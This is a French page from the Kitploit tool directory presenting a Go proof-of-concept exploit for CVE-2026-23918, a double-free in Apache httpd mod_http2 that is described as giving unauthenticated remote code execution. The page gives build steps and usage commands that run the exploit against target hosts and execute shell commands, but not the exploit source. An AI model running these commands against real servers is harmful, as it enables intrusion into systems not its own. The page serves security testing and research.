Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23918-Double-free-Apache-httpd-mod_http2 — Exploit de preuve de concept basé sur Go pour CVE-2026-23918 ciblant une vulnérabilité de double libération dans Apache httpd mod_http2, permettant une exécution de code à distance sans authentification via des séquences d'arrosage mémoire et de déclenchement. | Kitploit
Outils/GitHubGitHub/gagaltotal/cve-2026-23918-double-free-apache-httpd-mod_http2
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubgagaltotal/cve-2026-23918-double-free-apache-httpd-mod_http2

CVE-2026-23918-Double-free-Apache-httpd-mod_http2

Exploit de preuve de concept basé sur Go pour CVE-2026-23918 ciblant une vulnérabilité de double libération dans Apache httpd mod_http2, permettant une exécution de code à distance sans authentification via des séquences d'arrosage mémoire et de déclenchement.

Voir le dépôt
il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23918 - Preuve de concept Apache httpd mod_http2

Ce dépôt contient une implémentation de preuve de concept écrite en Go pour un scénario de corruption mémoire avant authentification affectant Apache httpd avec mod_http2. Le code dans ce dépôt démontre une approche de pulvérisation et de déclenchement contre une cible vulnérable et est destiné à la recherche en sécurité autorisée, aux tests et à l'analyse défensive.

Aperçu

Le projet se concentre sur un exploit de preuve de concept pour CVE-2026-23918 et fournit une implémentation en un seul fichier dans exploit_poc.go. Le programme :

  • Construit une charge utile de requête HTTP conçue
  • Effectue une activité de pulvérisation mémoire contre un service cible
  • Envoie une séquence de déclenchement HTTP/2
  • Tente d'exécuter une commande fournie via le chemin d'exécution vulnérable

Ce dépôt n'est pas destiné à une utilisation non autorisée contre des systèmes tiers.

Structure du projet

  • exploit_poc.go - Implémentation Go principale de la PoC
  • go.mod - Définition du module Go
  • exploit - Artefacts liés au projet ou ressources auxiliaires
  • images - Captures d'écran ou images d'accompagnement
  • Prérequis

    Avant de construire ou d'exécuter la PoC, assurez-vous que les éléments suivants sont disponibles :

    • Go 1.26.4 ou une version plus récente compatible
    • Privilèges root si vous utilisez l'extraction automatique d'adresse mémoire via /proc//mem
    • Accès réseau à l'instance Apache httpd cible
    • Un environnement de test que vous êtes autorisé à évaluer

    Construction et installation initiale

    Construisez le binaire avec la commande suivante :

    root@kitploit:~
    git clone https://github.com/gagaltotal/CVE-2026-23918-Double-free-Apache-httpd-mod_http2
    cd CVE-2026-23918-Double-free-Apache-httpd-mod_http2
    go mod init CVE-2026-23918-Double-free-Apache-httpd-mod_http2
    go mod tidy
    go run exploit_poc.go
    go build -o exploit exploit_poc.go
    

    Cela génère un exécutable nommé exploit dans la racine du projet.

    Utilisation

    Screen Capture

    Screen Capture

    La PoC prend en charge deux modes opérationnels :

    1. Mode automatique avec extraction d'adresse basée sur PID

    Ce mode nécessite un accès root et extrait automatiquement les adresses mémoire requises du processus worker Apache cible.

    root@kitploit:~
    sudo ./exploit \
      --pid 1234 \
      --host 192.168.1.100 \
      --port 443 \
      --cmd "id > /tmp/pwned"
    

    2. Mode manuel avec adresses explicites

    Ce mode nécessite que les adresses de la fonction system et de l'emplacement de requête du scoreboard soient fournies manuellement.

    root@kitploit:~
    ./exploit \
      --host 192.168.1.100 \
      --port 443 \
      --system 0x7f1234567890 \
      --scoreboard 0x7f1234000000 \
      --cmd "id > /tmp/pwned"
    

    Options de la ligne de commande

    Les principales options sont :

    • --host - Nom d'hôte ou adresse IP cible
    • --port - Port cible (par défaut : 443)
    • --workers - Nombre de threads de pulvérisation (par défaut : 32)
    • --cmd - Commande à exécuter sur la cible
    • --pid - ID du processus worker Apache pour l'extraction automatique d'adresse mémoire
    • --system - Adresse du symbole system en mode manuel
    • --scoreboard - Adresse de l'emplacement de requête du scoreboard en mode manuel

    Exemples de commandes

    Extraction automatique et exécution d'une commande

    root@kitploit:~
    sudo ./exploit --pid 1234 --host 10.0.0.20 --cmd "whoami"
    

    Mode manuel avec adresses explicites

    root@kitploit:~
    ./exploit \
      --host 10.0.0.20 \
      --system 0x7f1234567890 \
      --scoreboard 0x7f1234000000 \
      --cmd "uname -a"
    

    Remarques

    • L'exploit peut planter ou déstabiliser le service cible.
    • Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous êtes explicitement autorisé à tester.
    • Le programme gère SIGINT et SIGTERM pour arrêter la boucle de pulvérisation proprement.

    Utilisation responsable

    Ce dépôt est fourni à des fins éducatives et d'évaluation de sécurité défensive. Toute utilisation en dehors d'un environnement contrôlé et autorisé est déconseillée et peut violer les lois ou politiques applicables.

    Télécharger l’outil